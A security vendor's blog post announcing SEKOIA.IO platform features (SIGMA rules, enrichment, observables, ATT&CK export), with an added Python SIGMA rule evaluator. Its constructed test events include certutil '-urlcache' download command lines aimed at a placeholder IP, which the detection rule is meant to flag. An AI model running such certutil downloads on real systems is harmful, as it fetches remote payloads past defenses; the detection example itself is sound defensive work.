SIGMA, design and MITRE ATT&CK… new features of the XDR and CTI platform

Dec 3, 2021

SEKOIA.IO aims to stay as close as possible to the users of the platform, meeting their needs precisely while taking into account their workflow and user experience. In this spirit, the platform keeps evolving by regularly integrating new features and improving existing ones. This article covers all the new features released in December 2021.

SIGMA for the new detection workflow

Improved detection, choose the SIGMA detection language to facilitate the setup of your custom rules!

SEKOIA.IO’s detection workflow was historically based on the STIX patterning format; SIGMA support is now included in order to:

  • Facilitate the writing of detection rules by automatically generating a rule in SIGMA format when you select the desired fields in the “Details” tab of an event.
  • Simplify the reading, understanding and writing of rules, since SIGMA is a more common and unified detection language.
  • Write detection rules against the same data model as the events, which remains ECS (Elastic Common Schema).
  • Provide more stability and better performance at the detection level.
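To make the third point concrete, here is an added example (not SEKOIA.IO code, and not its rule engine): a small evaluator for a SIGMA-style rule whose detection fields are ECS dotted paths, run over a handful of ECS-shaped events. The rule, the events and the field names such as `process.command_line` and `user.name` are constructed for the illustration; the evaluator covers only the subset of SIGMA (map and list selections, the `contains`/`startswith`/`endswith`/`all` modifiers, and `and`/`or`/`not` conditions) needed to show that a rule and the events it matches share one data model, so no field mapping step is required.

```python
"""Evaluate a SIGMA-style rule over ECS-shaped events.

Added illustration, not SEKOIA.IO code. The rule and the events below are
constructed for this example; the evaluator implements only the SIGMA
subset needed to show field names in the rule resolving directly against
ECS fields in the events.
"""
import fnmatch
import re
from typing import Any

# Constructed rule, written as a dict to avoid a YAML dependency; the same
# keys would sit under `detection:` in the YAML form. Fields are ECS names.
RULE = {
    "title": "Suspicious certutil download (example)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "process.name|endswith": "certutil.exe",
            "process.command_line|contains|all": ["-urlcache", "http"],
        },
        "filter_admin": {                      # hypothetical allow-list
            "user.name": ["svc-patch", "svc-backup"],
        },
        "condition": "selection and not filter_admin",
    },
}

# Constructed ECS events (not real telemetry).
EVENTS = [
    {"@timestamp": "2021-12-03T10:00:00Z", "user": {"name": "alice"},
     "process": {"name": "certutil.exe",
                 "command_line": "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt a.txt"}},
    {"@timestamp": "2021-12-03T10:01:00Z", "user": {"name": "svc-patch"},
     "process": {"name": "certutil.exe",
                 "command_line": "certutil.exe -urlcache -f http://intranet/patch.cab p.cab"}},
    {"@timestamp": "2021-12-03T10:02:00Z", "user": {"name": "bob"},
     "process": {"name": "powershell.exe", "command_line": "powershell -nop"}},
    {"@timestamp": "2021-12-03T10:03:00Z", "user": {"name": "bob"},
     "process": {"name": "CertUtil.EXE",
                 "command_line": "certutil -urlcache -split -f HTTPS://x/y"}},
]


def get_field(event: dict, dotted: str) -> Any:
    """Resolve an ECS dotted path such as 'process.name' in a nested event."""
    cur: Any = event
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def match_value(actual: Any, pattern: str, modifiers: list[str]) -> bool:
    """SIGMA string matching is case-insensitive; handle the common modifiers."""
    if actual is None:
        return False
    a, p = str(actual).lower(), str(pattern).lower()
    if "re" in modifiers:
        return re.search(str(pattern), str(actual)) is not None
    if "contains" in modifiers:
        return p in a
    if "startswith" in modifiers:
        return a.startswith(p)
    if "endswith" in modifiers:
        return a.endswith(p)
    return fnmatch.fnmatchcase(a, p)   # plain values allow * and ? wildcards


def match_selection(event: dict, selection: Any) -> bool:
    """A map is AND across its keys; a list of values is OR (AND with `|all`)."""
    if isinstance(selection, list):            # list of maps -> OR of maps
        return any(match_selection(event, s) for s in selection)
    for key, values in selection.items():
        field, *modifiers = key.split("|")
        actual = get_field(event, field)
        candidates = values if isinstance(values, list) else [values]
        hits = [match_value(actual, v, modifiers) for v in candidates]
        if not (all(hits) if "all" in modifiers else any(hits)):
            return False
    return True


def evaluate(rule: dict, event: dict) -> bool:
    """Evaluate the condition (identifiers, and/or/not, parentheses only)."""
    detection = rule["detection"]
    results = {name: match_selection(event, sel)
               for name, sel in detection.items() if name != "condition"}
    expr = detection["condition"]
    if not re.fullmatch(r"[\w\s()]+", expr):
        raise ValueError("unsupported condition syntax: %r" % expr)
    # Substitute each selection name with its boolean result, then evaluate
    # the remaining and/or/not expression with builtins disabled.
    safe_expr = re.sub(r"\b(?!and\b|or\b|not\b)(\w+)\b",
                       lambda m: str(results[m.group(1)]), expr)
    return bool(eval(safe_expr, {"__builtins__": {}}, {}))


def run(rule: dict, events: list[dict]) -> list[str]:
    """Return the timestamps of the events the rule fires on."""
    return [e["@timestamp"] for e in events if evaluate(rule, e)]


if __name__ == "__main__":
    for ts in run(RULE, EVENTS):
        print("ALERT", RULE["title"], ts)
```

Note what the two non-matching events show: the second is excluded by the `filter_admin` selection even though the `selection` block matches, and the fourth still fires despite the mixed-case `CertUtil.EXE` and `HTTPS://`, because SIGMA string comparison is case-insensitive. A real engine also validates the `logsource` against the event's source before evaluating `detection`, which this example leaves out.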

Generate your rules now!

Faster investigation, use the assets created in SEKOIA.IO to enrich the events!

To make your investigations easier and more efficient, the new enrichment feature will allow you to have more context in your events thanks to the different assets created in SEKOIA.IO.

Tags associated with known observables in the Intelligence Center will also be available to provide more information on different attributes for a better understanding of the event.

Navigate easily through all the events related to the same asset!

The Observables page is getting a makeover

Not only a new design, but also more features!

As you already know, observables complement your IoC-based investigation. We’ve now linked the two: you can see which threats are related to an observable by viewing its relationships in the “Related Threats” tab.

To make it even easier to use them, you now have the option to:

  • Filter observables by type, tag and source.
  • Copy information related to observables such as ID or name in a single click.
  • View or copy an observable’s JSON representation more quickly.
  • Find threats associated with observables through the “Related Threats” tab to be redirected to the Intelligence page for maximum context.

Speed up your triage process by consulting the Observables!

Export relationships in MITRE ATT&CK format

In addition to CSV and JSON Lines, you can now export relationships in MITRE ATT&CK format. You can select one or more object types, or export them all, in the format of your choice.

Export the relationships that interest you now!

We detect offensive security tools

Thanks to the new trackers and detection rules deployed this month, SEKOIA.IO has improved its system and network detection coverage of offensive tools such as Covenant, Koadic and Sliver.

Two FLINT reports have also been published detailing how Covenant and Sliver work, and how they are used by cybercriminals and APTs.

A continuous improvement of our CTI base

An update of our Hatching Triage playbook has allowed our analysts to add to our CTI database the hashes of samples from the last 6 months, covering 35 malware and ransomware families.

This playbook also runs automatically every day to retrieve the hashes and malware/ransomware configurations of the latest samples published on the Triage sandbox and integrate them into SEKOIA.IO.

Chat with our team!

Would you like to know more about our solutions? Do you want to discover our XDR and CTI products? Do you have a cyber security project in your organization? Make an appointment and meet us!
